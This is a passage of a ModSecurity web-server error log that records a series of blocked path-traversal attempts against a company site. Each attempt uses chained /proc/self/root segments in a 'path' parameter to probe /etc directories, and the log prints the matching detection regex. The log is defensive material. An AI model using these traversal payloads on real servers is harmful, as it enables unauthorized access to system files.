"OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgeyrABkC4fWIHEf8HoHgAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:27.506055 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:39520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgeywlT9VtDQc7bgUyt-gAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:30.952776 2026] [:error] [pid 11972:tid 140411607643904] [client 74.7.243.203:39524] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgezpqj1wV0Si-OkefqQwAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:32.261894 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:34204] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge0Jqj1wV0Si-OkefqRwAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:33.433855 2026] [:error] [pid 11972:tid 140411624429312] [client 74.7.243.203:34210] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge0Zqj1wV0Si-OkefqSgAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:35.843559 2026] [:error] [pid 11972:tid 140411725141760] [client 74.7.243.203:34222] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge05qj1wV0Si-OkefqTwAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:37.135098 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:34238] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge1bysWC90G-1nBrBCvwAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:38.467227 2026] [:error] [pid 11972:tid 140411565680384] [client 74.7.243.203:34250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge1pqj1wV0Si-OkefqUgAAABU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:39.768775 2026] [:error] [pid 21946:tid 140411548894976] [client 74.7.243.203:34262] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge13bQATo66fKoS7xMnwAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:41.087657 2026] [:error] [pid 10772:tid 140411649607424] [client 74.7.243.203:33480] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge2f9ocpUE4ed4uDzrtQAAAgs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:16:42.454047 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.243.203:33482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge2tSswJuvopo3lOhbpQAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:02.599264 2026] [:error] [pid 21946:tid 140411741927168] [client 74.7.243.203:33490] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge7nbQATo66fKoS7xMsgAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:05.146041 2026] [:error] [pid 10772:tid 140411725141760] [client 74.7.243.203:42192] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge8f9ocpUE4ed4uDzruAAAAgI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:06.441234 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.243.203:42204] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge8njZBu2q05ozVU9VMwAAAVI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:07.734092 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.243.203:42212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge83jZBu2q05ozVU9VNQAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:09.064630 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:42228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge9f9ocpUE4ed4uDzrugAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:11.443636 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.243.203:32980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge99SswJuvopo3lOhbqgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:12.775591 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:32992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge-I6lpbStxTqkSktqDgAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:15.215088 2026] [:error] [pid 32654:tid 140411674785536] [client 74.7.243.203:32996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge-wlT9VtDQc7bgUyuKgAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:16.456781 2026] [:error] [pid 10709:tid 140411565680384] [client 74.7.243.203:32998] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge_BXjF1vJNtV6CWrzegAAAdU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:19.883875 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.243.203:33008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abge_wlT9VtDQc7bgUyuOAAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 12:17:24.783355 2026] [:error] [pid 32654:tid 140411624429312] [client 74.7.243.203:48318] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgfBAlT9VtDQc7bgUyuQwAAAQ4"], referer: 